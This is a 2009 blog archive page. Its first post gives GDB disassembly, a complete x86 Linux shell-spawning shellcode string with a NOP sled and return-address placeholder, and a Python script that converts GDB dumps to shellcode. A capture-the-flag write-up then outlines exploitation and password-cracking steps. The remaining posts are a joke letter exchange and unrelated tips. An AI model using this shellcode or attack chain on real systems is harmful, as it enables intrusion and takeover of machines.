November 2009 – muellis blog

Convert GDB output to C-style shellcode

Due to developing shellcode during the recent days, I ended up needing to convert GDB output to C style strings very often. My sample output from GDB looks like this:
(gdb) disassemble function Dump of assembler code for function function: 0x08048254 <function+0>: push %ebp 0x08048255 <function+1>: mov %esp,%ebp 0x08048257 <function+3>: pop %ebp 0x08048258 <function+4>: jmp 0x8048268 <begin> 0x0804825a <function+6>: inc %ecx 0x0804825b <function+7>: inc %ecx 0x0804825c <function+8>: inc %ecx 0x0804825d <function+9>: inc %ecx 0x0804825e <function+10>: jmp 0x80482b3 <bottom> 0x08048260 <function+12>: pop %esi 0x08048261 <function+13>: mov %esi,%esp 0x08048263 <function+15>: sub $0x78,%esp 0x08048266 <function+18>: xor %edi,%edi 0x08048268 <begin+0>: mov %edi,%eax 0x0804826a <begin+2>: inc %eax 0x0804826b <begin+3>: inc %eax 0x0804826c <begin+4>: int $0x80 0x0804826e <begin+6>: test %eax,%eax 0x08048270 <begin+8>: je 0x8048288 <child> 0x08048272 <parent+0>: mov %edi,%eax 0x08048274 <parent+2>: mov $0xa2,%al 0x08048276 <parent+4>: push $0x11111111 ---Type <return> to continue, or q <return> to quit--- 0x0804827b <parent+9>: push $0x11111111 0x08048280 <parent+14>: mov %esp,%ebx 0x08048282 <parent+16>: mov %edi,%ecx 0x08048284 <parent+18>: int $0x80 0x08048286 <parent+20>: jmp 0x8048272 <parent> 0x08048288 <child+0>: mov -0x204(%esi),%ebx 0x0804828e <child+6>: mov %edi,%ecx 0x08048290 <child+8>: mov $0x3f,%al 0x08048292 <child+10>: int $0x80 0x08048294 <child+12>: inc %ecx 0x08048295 <child+13>: mov %edi,%eax 0x08048297 <child+15>: mov $0x3f,%al 0x08048299 <child+17>: int $0x80 0x0804829b <child+19>: inc %ecx 0x0804829c <child+20>: mov %edi,%eax 0x0804829e <child+22>: mov $0x3f,%al 0x080482a0 <child+24>: int $0x80 0x080482a2 <execshell+0>: mov %edi,%eax 0x080482a4 <execshell+2>: mov %al,0x7(%esi) 0x080482a7 <execshell+5>: push %eax 0x080482a8 <execshell+6>: push %esi 0x080482a9 <execshell+7>: mov %edi,%edx 0x080482ab <execshell+9>: mov %esp,%ecx ---Type <return> to continue, or q <return> to quit--- 0x080482ad <execshell+11>: mov %esi,%ebx 0x080482af <execshell+13>: mov $0xb,%al 0x080482b1 <execshell+15>: int $0x80 0x080482b3 <bottom+0>: call 0x8048260 <function+12> 0x080482b8 <bottom+5>: das 0x080482b9 <bottom+6>: bound %ebp,0x6e(%ecx) 0x080482bc <bottom+9>: das 0x080482bd <bottom+10>: jae 0x8048327 <__floatdisf+55> 0x080482bf <bottom+12>: inc %ecx 0x080482c0 <bottom+13>: ret End of assembler dump. (gdb) x/98xb 0x0804825e 0x804825e <function+10>: 0xeb 0x53 0x5e 0x89 0xf4 0x83 0xec 0x78 0x8048266 <function+18>: 0x31 0xff 0x89 0xf8 0x40 0x40 0xcd 0x80 0x804826e <begin+6>: 0x85 0xc0 0x74 0x16 0x89 0xf8 0xb0 0xa2 0x8048276 <parent+4>: 0x68 0x11 0x11 0x11 0x11 0x68 0x11 0x11 0x804827e <parent+12>: 0x11 0x11 0x89 0xe3 0x89 0xf9 0xcd 0x80 0x8048286 <parent+20>: 0xeb 0xea 0x8b 0x9e 0xfc 0xfd 0xff 0xff 0x804828e <child+6>: 0x89 0xf9 0xb0 0x3f 0xcd 0x80 0x41 0x89 0x8048296 <child+14>: 0xf8 0xb0 0x3f 0xcd 0x80 0x41 0x89 0xf8 0x804829e <child+22>: 0xb0 0x3f 0xcd 0x80 0x89 0xf8 0x88 0x46 0x80482a6 <execshell+4>: 0x07 0x50 0x56 0x89 0xfa 0x89 0xe1 0x89 0x80482ae <execshell+12>: 0xf3 0xb0 0x0b 0xcd 0x80 0xe8 0xa8 0xff 0x80482b6 <bottom+3>: 0xff 0xff 0x2f 0x62 0x69 0x6e 0x2f ---Type <return> to continue, or q <return> to quit--- 0x73 0x80482be <bottom+11>: 0x68 0x41 (gdb) Quit
And my desired output are the bytes in these strings:

char shcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 /* First the NOPs*/
 "\xeb\x04"              /* Jump over the ret addr */
 "\x41\x41\x41\x41"        /* wannabe ret addr */
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 /* Second NOP slide */
 "\xeb\x5d\x5e\x89\xf4\x81\xec\xc8\x00\x00\x00\x31\xff\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x74\x17\xb8\xa2\x00\x00\x00\x68\xb8\x0b\x00\x00\x68\xb8\x0b\x00\x00\x89\xe3\x89\xf9\xcd\x80\xeb\xe9\x8b\x9e\xfc\xfd\xff\xff\x89\xf9\xb8\x3f\x00\x00\x00\xcd\x80\x41\xb8\x3f\x00\x00\x00\xcd\x80\x41\xb8\x3f\x00\x00\x00\xcd\x80\x89\xf8\x88\x46\x07\x50\x56\x89\xfa\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\xe8\x9e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
 /* that's the shellcode */

So I built a quick and dirty script which does the conversion and helped me saving a lot of time. Is there any better way of making gdb output the shellcode directly?

#!/usr/bin/env python
import sys
 
paginator  = '''---Type  to continue, or q  to quit---'''
 
def convert (to_convert):
    retlines = []
    for line in to_convert.splitlines():
        if line.startswith('--'):
            continue
        pos = line.find(":")
        newline_string = line[pos+1:]
        for needle, replacement  in (('\t', ''),
                       ('0x', r'\x'),
                       ('\n', ''),
                       (paginator, '')):
            newline_string = newline_string.replace(needle, replacement)
        retlines.append (newline_string)
    return "".join(retlines)
 
if __name__ == "__main__":
    to_convert = sys.stdin.read()
    converted = convert (to_convert)
    print converted

Want to take a guess what the shellcode actually does? It’s not too hard to see though.

IRISS Conference 2009

I had the joy to attend the first annual IRISS Conference 2009 which is a for free conference held by IRISS, the Irish CERT.

It was about cybercrime in general and there were speaker from e.g. SANS, IRISS -the local cert- or Team Cymru which I already enjoyed at DNF CERT Conf at the beginning of the year.

One talk I attended was by a local polices cybercrime investigation team. He basically talked about the goodness of creating movement profiles with GSM data and ISP keeping IP to customer data to catch criminals…

Then we participated in HackEire, a Capture the Flag style contest. We ran second. Not too bad for our sucky preparation and the fact that we spent more than an hour to make a Mac share its 3G uplink with two Linux Notebooks over (encrypted -didn’t work-) WiFi. The game network was 10.0.1.0/23 and the Mac automatically and not changable was 10.0.2.0/24. Although the networks overlapped by one bit I expected it to work for the majority of the packets being sent. But we failed. Hard. So hard, that the Mac couldn’t take part in the game anymore… I need to polish either my understanding of networking or my passion for hating Apple.

This CtF, however, was a bit different since there was one virtual network for everyone. I.e. no team had an own server or an own virtual network. There were four machines which were supposed to be owned in a given order. That wasn’t immediately clear and there were many tarpits to waste a lot of time. I.e. a Kernel in a supposed-to-be vulnerable version which is not exploitable, or a separate PHP user for the Webserver with a locked down home directory, tempting you to mess around with PHP scripts to investigate.

And the end of the day, the contest was about collecting secret keys to decrypt a file afterwards. The secret keys were more or less obviously lying around once the machine has been pwned. Passphrases to that secret keys were either user passwords or otherwise easily guessable strings.

The Machines were:

Linux Webserver. To be 0wned with a password being served on a page from the webserver. A bit obfuscated though, so that one had to use the source. Once SSHed to that host, secrings were lying around in ~/gnupg/. Also, weird processes were running that connected to a strange host outside the network (4) to send a password over the wire.
BIND on windows (sic!). To be pwned via the conficker exploit. Also, one should crack a users password using THCs Hydra.
Linux Mailserver. With SSH Server only visible when coming from (1). Log in with password from (2). Machine was running an old kernel, thus sooner or later you g0t root. Then search for keyring in home directories. Also, crack the shadow using a John that’s capable of cracking SHA256 (i.e. not the most recent version shipped with Ubuntu).
“hidden” DB server on Windows, only connectable from (1). You could find that machine by looking at the network interfaces of (1). You’d see that it has a second interface with a different IP thus inviting you to scan the new subnet. Luckily, there was an smbclient on (1) and with credentials from (1), one could enumerate all users (smbclient -L). Then, with the other credentials found on (1), connect and get keyring as well as final encrypted file.

That final file could be decrypted using keys and passphrases obtained earlier. Out came an ELF binary that looked, smelled and quacked like “ls”. However, it contained a steganographically hidden text file. Using a standard stego tool shipped with Backtrack, it’s possible to obtain the very final CSV file.

I not only liked the fact that they posted hints on the wall every now and then, but also that they actively walked around, talking to the teams and helped them actually achieving stuff. In fact, I wouldn’t even have thought about transferring zones from that BIND instance using AXFR or checking the machines whether they have an smbclient installed.

While we were playing, I bricked my sudo by trying to add a line without knowing the syntax. I couldn’t do sudo nano /etc/sudoers afterwards as it couldn’t parse the file, effectively leaving me without root access. I think I’ll better use visudo now…

Ireland vs. France

Heh, the following conversation might not have happened (unless the Consulat Général De France is located in “Joker Street”, but anyway, it’s hillarious. Either read the quotes or find the (largish) Image:

20 October 2009

Dear Sir,

I am writing to you on behalf of the French President, Monsieur Nicolas Sarkozy. Following the recent announcement of the World Cup play-off match between our two countries, the President has requested that you provide a VIP box for the game as he is very keen to attend.

Yours faithfully,
Jacques du Maurier
Directeur
Consulat Général de France
12-24 Rue des Blaguer
74139 Paris
France

23.10.09

Dear Mr. Du Maurier,

Thank-you for your recent letter concerning box arrangements at Croke Park. We are delighted that President Sarkozy wishes to attend and look forward to welcoming him. We would just like some clarification regarding the VIP box as there are a number of options available. Do you have any preferences re: size?

Yours faithfully,
Bill O’Leary
Liaison officer
Department of Diplomatic Affairs
28 St. Stephens Green South
Dublin 2
Ireland

26.10.09

Dear Mr. O’Leary,

Thank-you for your prompt response. We were not aware that the boxes at the stadium came in different sizes. Do the dimensions have any bearing on one’s enjoyment of the game?

Yours faithfully,
Jacques du Maurier

29.10.09

Dear Mr. Du Maurier,

The overall match experience will certainly be influenced by the President’s choice of box. The first box is 30cm high and will allow the President to see most of the Croke Park pitch, though he may not be quite able to see play in the North-West quadrant. The second box is 60cm, but whilst this would afford the President a panoramic view of the pitch, it will also make him visible to Press photographers which may compromise his privacy.

Yours faithfully,
Bill O’Leary

2 Novembre 2009

Dear Mr. O’Leary,

There appears to have been some confusion. When we requested a “VIP box” for our President, we were not looking for a box for him to stand on. Whilst we expect the foreign press to make humorous remarks about the President’s diminutive stature, we do not expect this from an official representative of the Irish government department.

Yours faithfully,
Jacques du Maurier

5.11.09

Please accept our apologies and those of the Executive Hospitality Committee at Croke Park. There was certainly no intentional attempt at humour on our part and we hope that you will accept this as a genuine misunderstanding. Naturally, we will make a VIP ‘Executive’ box available to the President, with full security and hospitality arrangements in place. The boxes will then be placed discreetly inside.

Yours faithfully,
Bill O’Leary

9 Novembre 2009

Sir,

In light of the lack of respect we feel your office has displayed in response to an official request from a visiting Head of State, the President has decided to watch the match in Paris instead. Rest assured that we will be lodging a formal complaint regarding your conduct at the highest levels.

Jacques du Maurier

12.11.09

Fair enough. We look forward to seeing the boys in green give your lot a good hammering.

Bill

Split CUE File and losslessly compressed Audio (FLAC, ape, …)

For some reason, I had to split a CUE file and a losslessly compressed audio file into single files to make it one file per track instead of one big file. My audio file was compressed with APE which I didn’t know before at all. But it has a weird license anyway.

So I came across a really good page describing what to do which is basically using shntool (homepage). It’s really good, easy to use and has built in transcoding through appropriate third party programs, so I could transcode to Vorbis on the fly 🙂 It converts anything to anything, as long as it’s sound so you might find that tool useful as well 🙂

GNOME Post-Only

FYI, if you happen to have multiple email addresses subscribed to multiple GNOME mailinglists and constantly forget which email address is allowed to post where, simply subscribe to post-only! After your subscription, you should be able to post with your email address on every list 🙂